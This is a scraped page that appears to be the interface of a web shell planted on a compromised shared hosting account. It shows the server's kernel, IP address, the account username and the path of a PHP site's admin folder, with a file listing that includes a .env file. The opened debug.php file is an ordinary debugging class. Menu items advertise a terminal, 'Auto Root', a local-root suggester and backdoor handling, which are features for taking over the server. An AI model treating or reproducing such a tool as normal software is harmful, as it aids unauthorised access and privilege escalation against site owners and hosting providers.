Linux business57.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
Server IP : 199.188.201.191 & Your IP : 18.119.0.35
Domains :
Cant Read [ /etc/named.conf ]
User : derozboy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
derozboy /
ornolevaxo.online /
app /
admin /
Delete
Unzip
Name
Size
Permission
Date
Action
Controllers
[ DIR ]
drwxr-xr-x
2023-06-28 01:39
Maps
[ DIR ]
drwxr-xr-x
2023-06-28 01:40
Models
[ DIR ]
drwxr-xr-x
2023-06-28 01:40
Providers
[ DIR ]
drwxr-xr-x
2023-06-28 01:40
Routes
[ DIR ]
drwxr-xr-x
2023-06-28 01:40
Storage
[ DIR ]
drwxr-xr-x
2023-06-28 01:40
Views
[ DIR ]
drwxr-xr-x
2023-06-28 01:40
css
[ DIR ]
drwxr-xr-x
2023-06-28 01:39
fonts
[ DIR ]
drwxr-xr-x
2023-06-28 01:39
images
[ DIR ]
drwxr-xr-x
2023-06-28 01:40
js
[ DIR ]
drwxr-xr-x
2023-06-28 01:40
partials
[ DIR ]
drwxr-xr-x
2023-06-28 01:40
scss
[ DIR ]
drwxr-xr-x
2023-06-28 01:40
vendor
[ DIR ]
drwxr-xr-x
2023-06-28 01:40
vendors
[ DIR ]
drwxr-xr-x
2023-06-28 01:40
.env
338
B
-rw-r--r--
2024-07-18 23:17
.htaccess
614
B
-rw-r--r--
2023-04-17 05:33
composer.json
504
B
-rw-r--r--
2023-04-17 05:33
composer.lock
11.82
KB
-rw-r--r--
2023-04-17 05:33
debug.php
674
B
-rw-r--r--
2023-04-17 05:33
index.php
232
B
-rw-r--r--
2023-04-17 05:33
server.php
1000
B
-rw-r--r--
2023-04-17 05:33
Save
Rename
<?php class debug { public function __construct() { error_reporting(E_ALL); ini_set("display_errors", 1); ini_set("display_startup_errors", true); } public static function dump($target, bool $end = false) { echo "<pre>"; var_dump($target); echo "</pre>"; if ($end) { die(); } } public static function dumpr($target, bool $end = false) { echo "<pre>"; print_r($target); echo "</pre>"; if ($end) { die(); } } public static function session() { self::dumpr($_SESSION , true); } }